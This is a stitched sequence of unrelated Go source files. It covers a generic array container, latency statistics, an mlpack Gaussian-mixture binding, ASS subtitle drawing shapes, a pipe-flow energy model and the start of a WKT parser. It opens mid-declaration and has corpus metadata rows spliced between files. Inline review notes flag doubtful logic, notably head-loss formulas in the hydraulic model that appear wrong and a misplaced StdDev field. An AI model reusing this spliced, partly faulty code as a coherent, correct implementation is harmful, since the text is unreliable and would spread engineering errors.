Array[T any] struct {
Values []*T
size int
functions map[string]any
}
)
func New[T any](functions map[string]any) (*Array[T], error) {
a := &Array[T]{
Values: []*T{},
size: 0,
functions: map[string]any{},
}
for k, v := range functions {
if reflect.TypeOf(v).Kind() == reflect.Func {
f := reflect.TypeOf(v)
// checks if function's first input is type of *Array[T]
if f.NumIn() > 0 && f.In(0).Kind() == reflect.Ptr && f.In(0).String() == reflect.TypeOf(a).String() {
a.functions[k] = v
} else {
return nil, errors.New(fmt.Sprintf("`%s` is a function but its first input must be type of %s", k, reflect.TypeOf(a).String()))
}
} else {
return nil, errors.New(fmt.Sprintf("`%s` is not a function", k))
}
}
return a, nil
}
// Clear drops all elements and resets the size to zero. The registered
// helper functions are kept.
func (a *Array[T]) Clear() {
	a.Values = []*T{}
	a.size = 0
}

// Run invokes the registered function named function, prepending the
// array itself as the first argument, and returns the reflected results.
// An error is returned when no function with that name is registered.
func (a *Array[T]) Run(function string, params ...any) ([]reflect.Value, error) {
	params = append([]any{a}, params...)
	if v, ok := a.functions[function]; ok {
		return internal.CallJobFuncWithParams(v, params)
	}
	// NOTE(review): errors.New(fmt.Sprintf(...)) is equivalent to fmt.Errorf(...).
	return nil, errors.New(fmt.Sprintf("%s not found", function))
}

// oneSizePlus increments the element count.
func (a *Array[T]) oneSizePlus() {
	a.size++
}

// oneSizeMinus decrements the element count, clamping at zero.
func (a *Array[T]) oneSizeMinus() {
	a.size--
	if a.size < 0 {
		a.size = 0
	}
}
// PeekFirst returns the first element without removing it, or nil when
// the array is empty.
func (a *Array[T]) PeekFirst() *T {
	if a.size == 0 {
		return nil
	}
	return a.Values[0]
}

// PeekLast returns the last element without removing it, or nil when the
// array is empty.
func (a *Array[T]) PeekLast() *T {
	if a.size == 0 {
		return nil
	}
	return a.Values[a.size-1]
}

// Peek returns the element at index without removing it, or nil when the
// index is out of range.
func (a *Array[T]) Peek(index int) *T {
	if index < 0 || index >= a.size {
		return nil
	}
	return a.Values[index]
}
// ReturnAsSlice copies the stored elements, dereferenced, into a fresh
// []T (a non-nil empty slice when the array is empty).
func (a *Array[T]) ReturnAsSlice() []T {
	out := make([]T, 0, len(a.Values))
	for _, p := range a.Values {
		out = append(out, *p)
	}
	return out
}
// PushLast appends data at the end and returns it.
func (a *Array[T]) PushLast(data *T) *T {
	a.Values = append(a.Values, data)
	a.oneSizePlus()
	return data
}

// PushFirst prepends data at the front and returns it.
func (a *Array[T]) PushFirst(data *T) *T {
	a.Values = append([]*T{data}, a.Values...)
	a.oneSizePlus()
	return data
}

// Push inserts data at index (0..size inclusive) and returns it, or nil
// when the index is out of range. The edge indexes delegate to
// PushFirst/PushLast.
func (a *Array[T]) Push(data *T, index int) *T {
	if index < 0 || index > a.size {
		return nil
	}
	if index == 0 {
		return a.PushFirst(data)
	} else if index == a.size {
		return a.PushLast(data)
	}
	// Shift the tail one slot to the right, then drop data into the gap.
	a.Values = append(a.Values[:index+1], a.Values[index:]...)
	a.Values[index] = data
	a.oneSizePlus()
	return data
}
// PopLast removes and returns the last element, or nil when the array is
// empty.
//
// Bug fix: after oneSizeMinus() the field a.size is already the index of
// the old last element; the previous code read Values[a.size-1], which
// returned the second-to-last element and panicked (index -1) when the
// array held exactly one element.
func (a *Array[T]) PopLast() *T {
	if a.size == 0 {
		return nil
	}
	a.oneSizeMinus()
	data := a.Values[a.size]
	a.Values = a.Values[:a.size]
	return data
}
// PopFirst removes and returns the first element, or nil when the array
// is empty.
func (a *Array[T]) PopFirst() *T {
	if a.size == 0 {
		return nil
	}
	a.oneSizeMinus()
	data := a.Values[0]
	a.Values = a.Values[1:]
	return data
}

// Pop removes and returns the element at index, or nil when the index is
// out of range. The edge indexes delegate to PopFirst/PopLast.
func (a *Array[T]) Pop(index int) *T {
	if index < 0 || index >= a.size {
		return nil
	}
	if index == 0 {
		return a.PopFirst()
	} else if index == a.size-1 {
		return a.PopLast()
	}
	data := a.Values[index]
	// Close the gap by shifting the tail one slot to the left.
	a.Values = append(a.Values[:index], a.Values[index+1:]...)
	a.oneSizeMinus()
	return data
}
// Displace swaps the elements at index1 and index2, reporting whether
// both indexes were in range.
func (a *Array[T]) Displace(index1 int, index2 int) bool {
	if index1 < 0 || index1 >= a.size || index2 < 0 || index2 >= a.size {
		return false
	}
	v1 := a.Values[index1]
	v2 := a.Values[index2]
	a.ReplaceValue(index1, v2)
	a.ReplaceValue(index2, v1)
	return true
}

// ReplaceValue overwrites the element at index, reporting whether the
// index was in range.
func (a *Array[T]) ReplaceValue(index int, data *T) bool {
	if index < 0 || index >= a.size {
		return false
	}
	a.Values[index] = data
	return true
}

// GetSize returns the number of stored elements.
func (a *Array[T]) GetSize() int {
	return a.size
}
package tachymeter
import (
"math"
"sort"
"sync/atomic"
)
// Calc summarizes Tachymeter sample data and returns it in the form of a *Metrics.
func (m *Tachymeter) Calc() *Metrics {
	metrics := &Metrics{}
	if atomic.LoadUint64(&m.count) == 0 {
		return metrics
	}
	m.Lock()
	// Only up to m.size samples are retained; Samples is the number
	// actually available, Count the total ever observed.
	metrics.Samples = int(math.Min(float64(atomic.LoadUint64(&m.count)), float64(m.size)))
	metrics.Count = int(atomic.LoadUint64(&m.count))
	// Copy the sample window under the lock so sorting and all further
	// statistics operate on a private slice.
	times := make(timeSlice, metrics.Samples)
	copy(times, m.times[:metrics.Samples])
	sort.Sort(times)
	metrics.Time.Cumulative = times.cumulative()
	// Rate: prefer the recorded wall-clock time when available, otherwise
	// fall back to the cumulative sample time; 1e9 converts a per-nanosecond
	// rate to per-second.
	var rateTime float64
	if m.wallTime != 0 {
		rateTime = float64(metrics.Count) / float64(m.wallTime)
	} else {
		rateTime = float64(metrics.Samples) / float64(metrics.Time.Cumulative)
	}
	metrics.Rate.Second = rateTime * 1e9
	m.Unlock()
	// Everything below reads only the private copy, so the lock is
	// already released.
	metrics.Time.Avg = times.avg()
	metrics.Time.HMean = times.hMean()
	metrics.Time.P50 = times[times.Len()/2]
	metrics.Time.P75 = times.p(0.75)
	metrics.Time.P95 = times.p(0.95)
	metrics.Time.P99 = times.p(0.99)
	metrics.Time.P999 = times.p(0.999)
	metrics.Time.Long5p = times.long5p()
	metrics.Time.Short5p = times.short5p()
	metrics.Time.Min = times.min()
	metrics.Time.Max = times.max()
	metrics.Time.Range = times.srange()
	metrics.Time.StdDev = times.stdDev()
	metrics.Histogram, metrics.HistogramBinSize = times.hgram(m.hBins)
	return metrics
}
// Snapshot summarizes Tachymeter sample data and returns it in the form of a *Metrics.
// It mirrors Calc but operates on the ranked samples (m.ranks) and fills
// the Rank section of Metrics.
func (m *Tachymeter) Snapshot() *Metrics {
	metrics := &Metrics{}
	if atomic.LoadUint64(&m.count) == 0 {
		return metrics
	}
	m.Lock()
	metrics.Samples = int(math.Min(float64(atomic.LoadUint64(&m.count)), float64(m.size)))
	metrics.Count = int(atomic.LoadUint64(&m.count))
	metrics.Wall = m.wallTime
	// Copy the ranked window under the lock so sorting happens on a
	// private slice.
	ranks := make(timeRank, metrics.Samples)
	copy(ranks, m.ranks[:metrics.Samples])
	// GO 1.8 or above:
	// sort.Slice(ranks)
	// sort.Sort(ranks)
	sort.Slice(ranks, func(i, j int) bool { return int64(ranks[i].duration) < int64(ranks[j].duration) })
	metrics.Rank.Cumulative = ranks.cumulative()
	var rateTime float64
	if m.wallTime != 0 {
		rateTime = float64(metrics.Count) / float64(m.wallTime)
	} else {
		// NOTE(review): this reads metrics.Time.Cumulative, which Snapshot
		// never sets (only Rank.Cumulative is) — likely a copy-paste slip
		// from Calc; confirm intended field.
		rateTime = float64(metrics.Samples) / float64(metrics.Time.Cumulative)
	}
	metrics.Rate.Second = rateTime * 1e9
	m.Unlock()
	metrics.Rank.Avg = ranks.avg()
	metrics.Rank.HMean = ranks.hMean()
	metrics.Rank.P50 = ranks.p50() // ranks.p(0.50) //[ranks.Len()/2]
	metrics.Rank.P75 = ranks.p(0.75)
	metrics.Rank.P95 = ranks.p(0.95)
	metrics.Rank.P99 = ranks.p(0.99)
	metrics.Rank.P999 = ranks.p(0.999)
	metrics.Rank.Long5p = ranks.long5p()
	metrics.Rank.Short5p = ranks.short5p()
	metrics.Rank.Max = ranks.maxStr()
	metrics.Rank.Min = ranks.minStr()
	metrics.Rank.Range = ranks.srange()
	// NOTE(review): every other statistic here goes to metrics.Rank, but
	// StdDev is written to metrics.Time — confirm whether Rank.StdDev was
	// intended.
	metrics.Time.StdDev = ranks.stdDev()
	metrics.Histogram, metrics.HistogramBinSize = ranks.hgram(m.hBins)
	return metrics
}
package mlpack
/*
#cgo CFLAGS: -I./capi -Wall
#cgo LDFLAGS: -L. -lmlpack_go_gmm_train
#include <capi/gmm_train.h>
#include <stdlib.h>
*/
import "C"
import "gonum.org/v1/gonum/mat"
// GmmTrainOptionalParam groups the optional parameters accepted by
// GmmTrain(). Fields left at their default values are treated as unset
// and are not forwarded to the underlying mlpack binding.
type GmmTrainOptionalParam struct {
	DiagonalCovariance bool
	InputModel         *gmm
	KmeansMaxIterations int
	MaxIterations      int
	NoForcePositive    bool
	Noise              float64
	Percentage         float64
	RefinedStart       bool
	Samplings          int
	Seed               int
	Tolerance          float64
	Trials             int
	Verbose            bool
}
// GmmTrainOptions returns a GmmTrainOptionalParam populated with the
// default value of every optional parameter of GmmTrain().
func GmmTrainOptions() *GmmTrainOptionalParam {
	return &GmmTrainOptionalParam{
		DiagonalCovariance: false,
		InputModel: nil,
		KmeansMaxIterations: 1000,
		MaxIterations: 250,
		NoForcePositive: false,
		Noise: 0,
		Percentage: 0.02,
		RefinedStart: false,
		Samplings: 100,
		Seed: 0,
		Tolerance: 1e-10,
		Trials: 1,
		Verbose: false,
	}
}
/*
This program takes a parametric estimate of a Gaussian mixture model (GMM)
using the EM algorithm to find the maximum likelihood estimate. The model may
be saved and reused by other mlpack GMM tools.
The input data to train on must be specified with the "Input" parameter, and
the number of Gaussians in the model must be specified with the "Gaussians"
parameter. Optionally, many trials with different random initializations may
be run, and the result with highest log-likelihood on the training data will
be taken. The number of trials to run is specified with the "Trials"
parameter. By default, only one trial is run.
The tolerance for convergence and maximum number of iterations of the EM
algorithm are specified with the "Tolerance" and "MaxIterations" parameters,
respectively. The GMM may be initialized for training with another model,
specified with the "InputModel" parameter. Otherwise, the model is initialized
by running k-means on the data. The k-means clustering initialization can be
controlled with the "KmeansMaxIterations", "RefinedStart", "Samplings", and
"Percentage" parameters. If "RefinedStart" is specified, then the
Bradley-Fayyad refined start initialization will be used. This can often lead
to better clustering results.
The 'diagonal_covariance' flag will cause the learned covariances to be
diagonal matrices. This significantly simplifies the model itself and causes
training to be faster, but restricts the ability to fit more complex GMMs.
If GMM training fails with an error indicating that a covariance matrix could
not be inverted, make sure that the "NoForcePositive" parameter is not
specified. Alternately, adding a small amount of Gaussian noise (using the
"Noise" parameter) to the entire dataset may help prevent Gaussians with zero
variance in a particular dimension, which is usually the cause of
non-invertible covariance matrices.
The "NoForcePositive" parameter, if set, will avoid the checks after each
iteration of the EM algorithm which ensure that the covariance matrices are
positive definite. Specifying the flag can cause faster runtime, but may also
cause non-positive definite covariance matrices, which will cause the program
to crash.
As an example, to train a 6-Gaussian GMM on the data in data with a maximum of
100 iterations of EM and 3 trials, saving the trained GMM to gmm, the
following command can be used:
// Initialize optional parameters for GmmTrain().
param := mlpack.GmmTrainOptions()
param.Trials = 3
gmm := mlpack.GmmTrain(data, 6, param)
To re-train that GMM on another set of data data2, the following command may
be used:
// Initialize optional parameters for GmmTrain().
param := mlpack.GmmTrainOptions()
param.InputModel = &gmm
new_gmm := mlpack.GmmTrain(data2, 6, param)
Input parameters:
- gaussians (int): Number of Gaussians in the GMM.
- input (mat.Dense): The training data on which the model will be fit.
- DiagonalCovariance (bool): Force the covariance of the Gaussians to
be diagonal. This can accelerate training time significantly.
- InputModel (gmm): Initial input GMM model to start training with.
- KmeansMaxIterations (int): Maximum number of iterations for the
k-means algorithm (used to initialize EM). Default value 1000.
- MaxIterations (int): Maximum number of iterations of EM algorithm
(passing 0 will run until convergence). Default value 250.
- NoForcePositive (bool): Do not force the covariance matrices to be
positive definite.
- Noise (float64): Variance of zero-mean Gaussian noise to add to data.
Default value 0.
- Percentage (float64): If using --refined_start, specify the
percentage of the dataset used for each sampling (should be between 0.0
and 1.0). Default value 0.02.
- RefinedStart (bool): During the initialization, use refined initial
positions for k-means clustering (Bradley and Fayyad, 1998).
- Samplings (int): If using --refined_start, specify the number of
samplings used for initial points. Default value 100.
- Seed (int): Random seed. If 0, 'std::time(NULL)' is used. Default
value 0.
- Tolerance (float64): Tolerance for convergence of EM. Default value
1e-10.
- Trials (int): Number of trials to perform in training GMM. Default
value 1.
- Verbose (bool): Display informational messages and the full list of
parameters and timers at the end of execution.
Output parameters:
- outputModel (gmm): Output for trained GMM model.
*/
func GmmTrain(gaussians int, input *mat.Dense, param *GmmTrainOptionalParam) (gmm) {
	resetTimers()
	enableTimers()
	disableBacktrace()
	disableVerbose()
	restoreSettings("Gaussian Mixture Model (GMM) Training")

	// Required parameters are always forwarded.
	setParamInt("gaussians", gaussians)
	setPassed("gaussians")

	// Detect if the parameter was passed; set if so.
	gonumToArmaMat("input", input)
	setPassed("input")

	// NOTE(review): optional parameters are forwarded only when they differ
	// from their default, so an explicit default (e.g. Trials = 1) is
	// indistinguishable from "unset".
	// Detect if the parameter was passed; set if so.
	if param.DiagonalCovariance != false {
		setParamBool("diagonal_covariance", param.DiagonalCovariance)
		setPassed("diagonal_covariance")
	}

	// Detect if the parameter was passed; set if so.
	if param.InputModel != nil {
		setGMM("input_model", param.InputModel)
		setPassed("input_model")
	}

	// Detect if the parameter was passed; set if so.
	if param.KmeansMaxIterations != 1000 {
		setParamInt("kmeans_max_iterations", param.KmeansMaxIterations)
		setPassed("kmeans_max_iterations")
	}

	// Detect if the parameter was passed; set if so.
	if param.MaxIterations != 250 {
		setParamInt("max_iterations", param.MaxIterations)
		setPassed("max_iterations")
	}

	// Detect if the parameter was passed; set if so.
	if param.NoForcePositive != false {
		setParamBool("no_force_positive", param.NoForcePositive)
		setPassed("no_force_positive")
	}

	// Detect if the parameter was passed; set if so.
	if param.Noise != 0 {
		setParamDouble("noise", param.Noise)
		setPassed("noise")
	}

	// Detect if the parameter was passed; set if so.
	if param.Percentage != 0.02 {
		setParamDouble("percentage", param.Percentage)
		setPassed("percentage")
	}

	// Detect if the parameter was passed; set if so.
	if param.RefinedStart != false {
		setParamBool("refined_start", param.RefinedStart)
		setPassed("refined_start")
	}

	// Detect if the parameter was passed; set if so.
	if param.Samplings != 100 {
		setParamInt("samplings", param.Samplings)
		setPassed("samplings")
	}

	// Detect if the parameter was passed; set if so.
	if param.Seed != 0 {
		setParamInt("seed", param.Seed)
		setPassed("seed")
	}

	// Detect if the parameter was passed; set if so.
	if param.Tolerance != 1e-10 {
		setParamDouble("tolerance", param.Tolerance)
		setPassed("tolerance")
	}

	// Detect if the parameter was passed; set if so.
	if param.Trials != 1 {
		setParamInt("trials", param.Trials)
		setPassed("trials")
	}

	// Detect if the parameter was passed; set if so.
	if param.Verbose != false {
		setParamBool("verbose", param.Verbose)
		setPassed("verbose")
		enableVerbose()
	}

	// Mark all output options as passed.
	setPassed("output_model")

	// Call the mlpack program.
	C.mlpackGmmTrain()

	// Initialize result variable and get output.
	var outputModel gmm
	outputModel.getGMM("output_model")

	// Clear settings.
	clearSettings()

	// Return output(s).
	return outputModel
}
package draw
import (
"fmt"
"math"
"regexp"
"strings"
"github.com/Alquimista/eyecandy/utils"
)
// Filter rewrites a single regexp match of a drawing string and returns
// the replacement text.
type Filter func(m string) string

// Shape accumulates an ASS (Advanced SubStation Alpha) vector drawing
// command string; methods append commands and return a modified copy.
type Shape struct {
	draw string
}
// M Draw Move. Note: the receiver is a value, so the original Shape is
// untouched — callers must use the returned *Shape.
func (d Shape) M(x, y int) *Shape {
	d.draw += fmt.Sprintf(`m %d %d `, x, y)
	return &d
}

// N Draw Move (no closing). Same value-receiver semantics as M.
func (d Shape) N(x, y int) *Shape {
	d.draw += fmt.Sprintf(`n %d %d `, x, y)
	return &d
}

// L Line. Same value-receiver semantics as M.
func (d Shape) L(x, y int) *Shape {
	d.draw += fmt.Sprintf(`l %d %d `, x, y)
	return &d
}

// B Bézier. Exactly 6 ints emit a cubic Bézier ("b" command); more than 6
// with an even count emit a B-spline ("s ... c"); anything else panics.
func (d Shape) B(args ...int) *Shape {
	lenARGS := len(args)
	if 6 > lenARGS {
		panic("Not enough parameters.")
	} else if lenARGS == 6 {
		x1, y1, x2, y2, x3, y3 := args[0], args[1], args[2],
			args[3], args[4], args[5]
		d.draw += fmt.Sprintf(`b %d %d %d %d %d %d `, x1, y1, x2, y2, x3, y3)
	} else if lenARGS%2 == 0 {
		// Coordinate pairs form a spline; "c" closes the spline command.
		bspline := "s "
		for _, arg := range args {
			bspline += fmt.Sprintf(`%d `, arg)
		}
		d.draw += bspline + "c"
	} else {
		panic("Wrong parameter count.")
	}
	return &d
}
// Clip Vector Drawing: returns a \clip override tag using this shape as
// the clipping path. mode must be one of the valid drawing modes 1, 2 or 4.
func (d Shape) Clip(mode int) string {
	// Bug fix: the original check combined mutually exclusive conditions
	// with && and could never fire; reject everything outside {1, 2, 4}.
	if mode < 1 || mode == 3 || mode > 4 {
		panic("Draw mode parameter accept int number in range [1,2,4].")
	}
	return fmt.Sprintf(`\clip(%d,%s)`, mode, d)
}
// IClip Inverse Vector Drawing: returns an \iclip override tag using this
// shape as the (inverse) clipping path. mode must be 1, 2 or 4.
func (d Shape) IClip(mode int) string {
	// Bug fix: the original check combined mutually exclusive conditions
	// with && and could never fire; reject everything outside {1, 2, 4}.
	if mode < 1 || mode == 3 || mode > 4 {
		panic("Draw mode parameter accept int number in range [1,2,4].")
	}
	return fmt.Sprintf(`\iclip(%d,%s)`, mode, d)
}
// Draw Drawing command: wraps the shape in {\p<mode>} ... {\p0} override
// tags so it renders as a drawing. mode must be 1, 2 or 4.
func (d Shape) Draw(mode int) string {
	// Bug fix: the original check combined mutually exclusive conditions
	// with && and could never fire; reject everything outside {1, 2, 4}.
	if mode < 1 || mode == 3 || mode > 4 {
		panic("Draw mode parameter accept int number in range [1,2,4].")
	}
	return fmt.Sprintf(`{\p%d}%s{\p0}`, mode, d)
}
// String returns the accumulated drawing command string.
func (d Shape) String() string {
	return d.draw
}

// NewShape creates a new empty Shape.
func NewShape() *Shape {
	return &Shape{}
}
// Poligon builds a regular polygon with s sides inscribed in a circle of
// radius r, translated so it lies in positive coordinates.
// NOTE(review): conventionally spelled "Polygon"; the name is kept for
// API compatibility.
func Poligon(r int, s int) *Shape {
	// Interior step between vertices, starting offset so an edge is level.
	iangle := 360.0 / float64(s)
	angle := 90.0 + (iangle / 2.0)
	d := NewShape()
	d = d.M(utils.Polar2Rect(float64(r), angle))
	angle += iangle
	for i := 1; i < s+1; i++ {
		// convert polar to rectangular
		d = d.L(utils.Polar2Rect(float64(r), angle))
		angle += iangle
	}
	d = d.Translate(r, r)
	return d
}
// Pentagon builds a regular 5-sided polygon of radius r.
func Pentagon(r int) *Shape {
	return Poligon(r, 5)
}

// Hexagon builds a regular 6-sided polygon of radius r.
func Hexagon(r int) *Shape {
	return Poligon(r, 6)
}
// Star builds a star with the given number of spikes, alternating between
// an inner radius and an outer radius, translated into positive
// coordinates. The argument order of r1/r2 does not matter.
func Star(r1 int, r2 int, spikes int) *Shape {
	// the smallest radio is always the inner circle
	if r1 > r2 {
		r1, r2 = r2, r1
	}
	// angle1 walks the inner vertices, angle2 the outer ones, offset by
	// half a step so the points interleave.
	iangle := 360.0 / float64(spikes)
	angle1 := -90.0 + (iangle / 2.0)
	angle2 := angle1 + (iangle / 2.0)
	d := NewShape()
	for i := 0; i < spikes+1; i++ {
		// ass draw commands
		// convert polar to rectangular
		if i == 0 {
			d = d.M(utils.Polar2Rect(float64(r1), angle1))
		} else {
			d = d.L(utils.Polar2Rect(float64(r1), angle1))
		}
		d = d.L(utils.Polar2Rect(float64(r2), angle2))
		angle1 += iangle
		angle2 += iangle
	}
	d = d.Translate(r2, r2)
	return d
}
// Pixel builds a 1x1 square drawing.
func Pixel() *Shape {
	return Square(1, 1)
}

// Dot builds a radius-1 circle drawing.
func Dot() *Shape {
	return Circle(1, false)
}
// Square builds a w×h axis-aligned rectangle anchored at the origin.
func Square(w, h int) *Shape {
	return NewShape().M(0, 0).L(w, 0).L(w, h).L(0, h)
}

// Rectangle builds a rectangle spanning the corners (x1,y1) and (x2,y2).
func Rectangle(x1, y1, x2, y2 int) *Shape {
	return NewShape().M(x1, y1).L(x2, y1).L(x2, y2).L(x1, y2)
}
// Circle builds a circle of radius r by scaling a fixed 100-unit Bézier
// circle path down to the requested diameter. When subtract is true the
// path's x/y coordinates are swapped first — presumably to reverse the
// winding so the circle cuts a hole out of an enclosing shape (confirm
// against renderer behavior).
func Circle(r int, subtract bool) *Shape {
	// Rescale each number from the 100-unit template to the 2r diameter.
	resize := func(m string) string {
		return fmt.Sprintf(`%g`, (utils.Str2float(m)/100.0)*float64(r)*2.0)
	}
	// Swap each "x y" coordinate pair, mirroring the path across y = x.
	swapCoords := func(m string) string {
		pos := strings.Split(m, " ")
		return fmt.Sprintf(`%s %s`, pos[1], pos[0])
	}
	d := NewShape()
	// Template: a unit circle of diameter 100 approximated by four cubic
	// Bézier arcs.
	d.draw = "m 50 0 b 22 0 0 22 0 50 b 0 78 22 100 50 100 b 78 100 100 78 " +
		"100 50 b 100 22 78 0 50 0 "
	if subtract {
		d.draw = ShapeFilter(d.draw, swapCoords, "")
	}
	d.draw = ShapeFilter(d.draw, resize, `\d+`)
	return d
}
// Triangle draws an equilateral triangle with the given side length,
// shifted down by its height so it sits in the positive quadrant.
func Triangle(size int) *Shape {
	// height of an equilateral triangle: sqrt(3)/2 * side
	h := math.Sqrt(3) * (float64(size) / 2.0)
	base := -h
	d := NewShape()
	d.draw = fmt.Sprintf(`m %g %g l %g %g 0 %g %g %g`,
		float64(size)/2.0, float64(base),
		float64(size), base+h,
		base+h, float64(size)/2.0, base)
	// Bug fix: Translate has a value receiver and returns a new *Shape;
	// the previous code discarded its result, so the triangle was never
	// moved down and remained above the origin.
	d = d.Translate(0, int(h+0.5))
	return d
}
// Ring draws an annulus with outer radius radio and ring thickness
// outlineWidth, by overlaying a reverse-wound inner circle on a filled
// outer circle.
func Ring(radio, outlineWidth int) *Shape {
	radio2 := radio - outlineWidth
	// subtract=true reverses the inner circle so it cuts a hole
	circle2 := Circle(radio2, true)
	// re-center the inner circle inside the outer one:
	// net shift is (radio - radio2) in both axes
	circle2 = circle2.Translate(-radio2, -radio2)
	circle2 = circle2.Translate(radio, radio)
	d := NewShape()
	d.draw = Circle(radio, false).draw + circle2.draw
	return d
}

// Heart draws a heart shape scaled to the given size; the canonical
// drawing spans 30 units.
func Heart(size int) *Shape {
	resize := func(m string) string {
		return fmt.Sprintf(`%g`, (utils.Str2float(m)/30.0)*float64(size))
	}
	d := NewShape()
	d.draw = "m 15 30 b 27 22 30 18 30 14 30 8 22 " +
		"0 15 10 8 0 0 8 0 14 0 18 3 22 15 30"
	d.draw = ShapeFilter(d.draw, resize, `\d+`)
	return d
}
// ShapeFilter applies the replacement function f to every match of the
// regular expression rx inside the drawing string. When rx is empty, a
// default pattern matching "x y" coordinate pairs (signed integers or
// decimals) is used.
func ShapeFilter(shape string, f Filter, rx string) string {
	r := regexp.MustCompile(`(-?\d+\.\d+|-?\d+)\s(-?\d+\.\d+|-?\d+)`)
	if rx != "" {
		r = regexp.MustCompile(rx)
	}
	return r.ReplaceAllStringFunc(shape, f)
}
// Scale multiplies every coordinate pair in the drawing by the given
// x/y factors and returns the scaled copy (value receiver: the caller's
// Shape is left untouched).
func (d Shape) Scale(x, y float64) *Shape {
	d.draw = ShapeFilter(d.draw, func(m string) string {
		coords := strings.Split(m, " ")
		sx := utils.Str2float(coords[0]) * x
		sy := utils.Str2float(coords[1]) * y
		return fmt.Sprintf(`%g %g`, sx, sy)
	}, "")
	return &d
}

// Translate shifts every coordinate pair in the drawing by (x, y) and
// returns the moved copy (value receiver: the caller's Shape is left
// untouched).
func (d Shape) Translate(x, y int) *Shape {
	dx, dy := float64(x), float64(y)
	d.draw = ShapeFilter(d.draw, func(m string) string {
		coords := strings.Split(m, " ")
		px := utils.Str2float(coords[0]) + dx
		py := utils.Str2float(coords[1]) + dy
		return fmt.Sprintf(`%g %g`, px, py)
	}, "")
	return &d
}
// Flip mirrors the shape horizontally by negating every x coordinate
// (value receiver: the caller's Shape is left untouched).
func (d Shape) Flip() *Shape {
	flip := func(m string) string {
		pos := strings.Split(m, " ")
		px, py := 0-utils.Str2float(pos[0]), utils.Str2float(pos[1])
		return fmt.Sprintf(`%g %g`, px, py)
	}
	d.draw = ShapeFilter(d.draw, flip, "")
	return &d
} | draw/draw.go | 0.729134 | 0.464537 | draw.go | starcoder |
package euler
import (
"fmt"
"math"
)
const gravity = 9.8
// Ref is the boundary reference condition (height and pressure) at the
// inlet of a hydraulic model.
type Ref struct {
	// Relative Height [m]
	Z float64
	// Relative Pressure [Pa]
	P float64
}
// New builds a Model for the given fluid, anchored at the reference
// height/pressure r. The reference point is represented as an initial
// zero-length pipe at height r.Z.
func New(r Ref, f Fluid) *Model {
	start := Pipe{z: r.Z}
	return &Model{
		pipes:  []Pipe{start},
		fluid:  f,
		startP: r.P,
	}
}
// Model is a chain of connected pipes carrying a single fluid from a
// starting reference pressure.
type Model struct {
	startP float64 // inlet reference pressure [Pa]
	pipes  []Pipe
	fluid  Fluid
}
// Connect appends the given pipes to the model's chain and returns the
// model so calls can be chained.
func (m *Model) Connect(pipes ...Pipe) *Model {
	m.pipes = append(m.pipes, pipes...)
	return m
}
// End iterates the energy balance for the given outlet pressure P [Pa]
// and returns the converged volumetric flow rate Q. Fixed-point
// iteration: Qnew = sqrt(-As/Bs), stopping when the relative change
// falls below 0.1% or after 1000 iterations.
func (m *Model) End(P float64) (Q float64) {
	pa := m.startP
	za := m.first().z
	zb := m.last().z
	// pressure head difference plus static (elevation) head
	As := (P-pa)/(gravity*m.fluid.rho) + zb - za
	// Pipe areas
	Q = 0.01 // initial guess for the flow rate
	Dq := 10.
	i := 0
	for math.Abs(Dq/Q) > 1e-3 && i < 1000 {
		i++
		Bs := m.bs(Q)
		Qnew := math.Sqrt(-As / Bs)
		if math.IsNaN(Qnew) {
			panic("got NaN")
		}
		Dq = Q - Qnew
		Q = Qnew
		// NOTE(review): debug print left in library code — consider removing
		fmt.Printf("Dq=%.4g, Qnew=%g\n", Dq, Qnew)
	}
	return Q
}
// bs computes the flow-rate-dependent coefficient Bs used by End's
// fixed-point iteration (velocity-head terms at inlet/outlet plus the
// friction contribution of every pipe at flow rate Q).
func (m *Model) bs(Q float64) float64 {
	// inlet/outlet cross-sectional areas
	Aa := math.Pi * m.first().d * m.first().d / 4
	Ab := math.Pi * m.last().d * m.last().d / 4
	// Calculate flow energy correction factor (α = 2 for laminar flow,
	// 1 for turbulent).
	Rea := re(m.first().d, Q/Aa, m.fluid.mu, m.fluid.rho)
	Reb := re(m.last().d, Q/Ab, m.fluid.mu, m.fluid.rho)
	αa := 1.
	αb := 1.
	if isLaminar(Rea) {
		αa = 2.
	}
	if isLaminar(Reb) {
		αb = 2.
	}
	// NOTE(review): velocity-head terms are conventionally α/(2*g*A²);
	// here the area appears to the first power — confirm the intended
	// formulation.
	Bs := αb/(2*Ab*gravity) - αa/(2*Aa*gravity)
	for _, p := range m.pipes {
		A := math.Pi * p.d * p.d / 4
		u := Q / A
		// NOTE(review): Darcy head loss is normally f*(l/d)*u²/(2g); the
		// u²/(2g) factor is absent here — confirm.
		Bs += p.l / p.d * estimateDarcy(p.d, u, p.ε, m.fluid.mu, m.fluid.rho)
	}
	// Bug fix: this previously returned the input flow rate Q, discarding
	// the computed coefficient Bs entirely and breaking End's iteration.
	return Bs
}
// first returns the inlet pipe (index 0).
func (m *Model) first() Pipe {
	return m.pipes[0]
}

// last returns the outlet pipe (highest index).
func (m *Model) last() Pipe {
	n := len(m.pipes)
	return m.pipes[n-1]
}
// Fluid holds the physical properties of the working fluid.
type Fluid struct {
	// dynamic viscosity [Pa*s]
	mu float64
	// density [kg/m^3]
	rho float64
}
// estimateDarcy estimates the Darcy friction factor. For laminar flow it
// uses f = 64/Re; otherwise it uses the Haaland approximation to the
// Colebrook equation:
//
//	1/sqrt(f) = -1.8 * log10( (ε/(3.7*D))^1.11 + 6.9/Re )
func estimateDarcy(D, U, ε, mu, rho float64) float64 {
	Re := re(D, U, mu, rho)
	if isLaminar(Re) {
		// Laminar flow condition
		return 64 / Re
	}
	// Bug fix: the Haaland correlation is defined with the base-10
	// logarithm; the previous math.Log (natural log) overstated 1/sqrt(f)
	// by a factor of ln(10), understating f by roughly 5.3x.
	invsqrt := -1.8 * math.Log10(math.Pow(ε/(3.7*D), 1.11)+6.9/Re)
	return 1 / (invsqrt * invsqrt)
}
// isLaminar reports whether the flow at Reynolds number Re is treated
// as laminar (below the transition threshold used by this model).
func isLaminar(Re float64) bool {
	const transition = 2600
	return Re < transition
}
// re computes the Reynolds number Re = rho*U*D/mu for pipe diameter D,
// flow velocity U, dynamic viscosity mu and fluid density rho.
func re(D, U, mu, rho float64) float64 {
	reynolds := U * rho / mu * D
	return reynolds
}
// Water20C approximates liquid water at 20°C.
var Water20C = Fluid{
	mu:  1e-3,
	rho: 1e3,
} | model.go | 0.782787 | 0.412708 | model.go | starcoder |
package geom
import (
"bufio"
"bytes"
"fmt"
"io"
"strconv"
"strings"
)
const Empty = "EMPTY"
// NewGeometryFromWKT parses a WKT string into a new Geometry.
func NewGeometryFromWKT(wkt string) (*Geometry, error) {
